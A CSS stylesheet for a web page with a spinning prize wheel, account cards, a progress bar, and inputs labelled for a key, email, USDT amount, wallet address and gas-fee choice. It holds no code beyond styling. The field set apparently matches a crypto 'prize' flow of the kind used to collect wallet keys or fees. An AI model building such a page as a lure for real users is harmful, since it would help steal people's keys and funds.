* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Arial', sans-serif;
}

body {
    background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);
    min-height: 100vh;
    display: flex;
    justify-content: center;
    align-items: center;
}

.container {
    width: 100%;
    max-width: 500px;
    background-color: white;
    border-radius: 20px;
    box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);
    overflow: hidden;
}

.screen {
    padding: 30px;
    text-align: center;
    min-height: 600px;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
}

.hidden {
    display: none;
}

h1 {
    color: #333;
    margin-bottom: 20px;
    font-size: 28px;
}

p {
    color: #666;
    margin-bottom: 15px;
    line-height: 1.5;
}

.btn {
    padding: 15px 30px;
    border: none;
    border-radius: 50px;
    font-size: 18px;
    font-weight: bold;
    cursor: pointer;
    transition: all 0.3s ease;
    margin-top: 20px;
}

.primary-btn {
    background: linear-gradient(45deg, #FF6B6B, #FF8E53);
    color: white;
}

.primary-btn:hover {
    transform: translateY(-3px);
    box-shadow: 0 10px 20px rgba(255, 107, 107, 0.3);
}

.secondary-btn {
    background: #f0f0f0;
    color: #333;
}

.secondary-btn:hover {
    background: #e0e0e0;
}

.disabled {
    opacity: 0.5;
    cursor: not-allowed;
}

/* Wheel Styles */
.wheel-container {
    position: relative;
    width: 250px;
    height: 250px;
    margin: 30px auto;
}

.wheel {
    width: 100%;
    height: 100%;
    border-radius: 50%;
    position: relative;
    overflow: hidden;
    box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
}

.wheel-inner {
    width: 100%;
    height: 100%;
    background: conic-gradient(
            #FF6B6B 0% 20%,
            #4ECDC4 20% 40%,
            #FFD166 40% 60%,
            #6A0572 60% 80%,
            #1A535C 80% 100%
    );
    animation: spin 8s linear infinite;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

.wheel-pointer {
    position: absolute;
    top: -20px;
    left: 50%;
    transform: translateX(-50%);
    width: 0;
    height: 0;
    border-left: 15px solid transparent;
    border-right: 15px solid transparent;
    border-top: 30px solid #333;
    z-index: 10;
}

/* Prize Image */
.prize-image {
    width: 150px;
    height: 150px;
    margin: 20px auto;
    display: flex;
    justify-content: center;
    align-items: center;
    background: linear-gradient(45deg, #FFD166, #FF6B6B);
    border-radius: 50%;
}

.prize-icon {
    font-size: 80px;
}

/* Options Container */
.options-container {
    display: flex;
    justify-content: space-around;
    width: 100%;
    margin: 30px 0;
}

.option-card {
    width: 45%;
    padding: 20px;
    border-radius: 15px;
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
    cursor: pointer;
    transition: all 0.3s ease;
}

.option-card:hover {
    transform: translateY(-5px);
    box-shadow: 0 10px 25px rgba(0, 0, 0, 0.15);
}

.option-icon {
    font-size: 40px;
    margin-bottom: 10px;
}

/* Account Selection */
.account-options {
    display: flex;
    justify-content: space-around;
    width: 100%;
    margin: 30px 0;
}

.account-option {
    width: 30%;
    padding: 15px;
    border-radius: 15px;
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
    cursor: pointer;
    transition: all 0.3s ease;
}

.account-option:hover, .account-option.selected {
    transform: translateY(-5px);
    box-shadow: 0 10px 25px rgba(0, 0, 0, 0.15);
    border: 2px solid #FF6B6B;
}

.account-logo {
    width: 50px;
    height: 50px;
    margin: 0 auto 10px;
    display: flex;
    justify-content: center;
    align-items: center;
    background: #f0f0f0;
    border-radius: 50%;
    font-size: 24px;
    font-weight: bold;
}

/* Progress Bar */
.progress-container {
    width: 100%;
    margin: 30px 0;
}

.progress-bar {
    width: 100%;
    height: 20px;
    background-color: #f0f0f0;
    border-radius: 10px;
    overflow: hidden;
    margin-bottom: 15px;
}

.progress {
    height: 100%;
    background: linear-gradient(45deg, #FF6B6B, #FF8E53);
    border-radius: 10px;
}

/* Key Input */
.key-input-container {
    width: 100%;
    margin-top: 20px;
}

.key-input {
    width: 100%;
    padding: 15px;
    border: 1px solid #ddd;
    border-radius: 10px;
    margin-bottom: 15px;
    font-size: 16px;
}

/* Success Icon */
.success-icon {
    font-size: 60px;
    color: #4CAF50;
    margin: 20px 0;
}

/* Email Input */
.email-input-container, .usdt-input-container, .address-input-container {
    width: 100%;
    margin-top: 20px;
}

.email-input, .usdt-input, .address-input {
    width: 100%;
    padding: 15px;
    border: 1px solid #ddd;
    border-radius: 10px;
    margin-bottom: 15px;
    font-size: 16px;
}

/* Loading Spinner */
.loading-spinner {
    width: 50px;
    height: 50px;
    border: 5px solid #f3f3f3;
    border-top: 5px solid #FF6B6B;
    border-radius: 50%;
    animation: spin 1s linear infinite;
    margin: 20px auto;
}

/* Gas Options */
.gas-options {
    display: flex;
    justify-content: space-around;
    width: 100%;
    margin-top: 30px;
}

.gas-options .btn {
    width: 45%;
}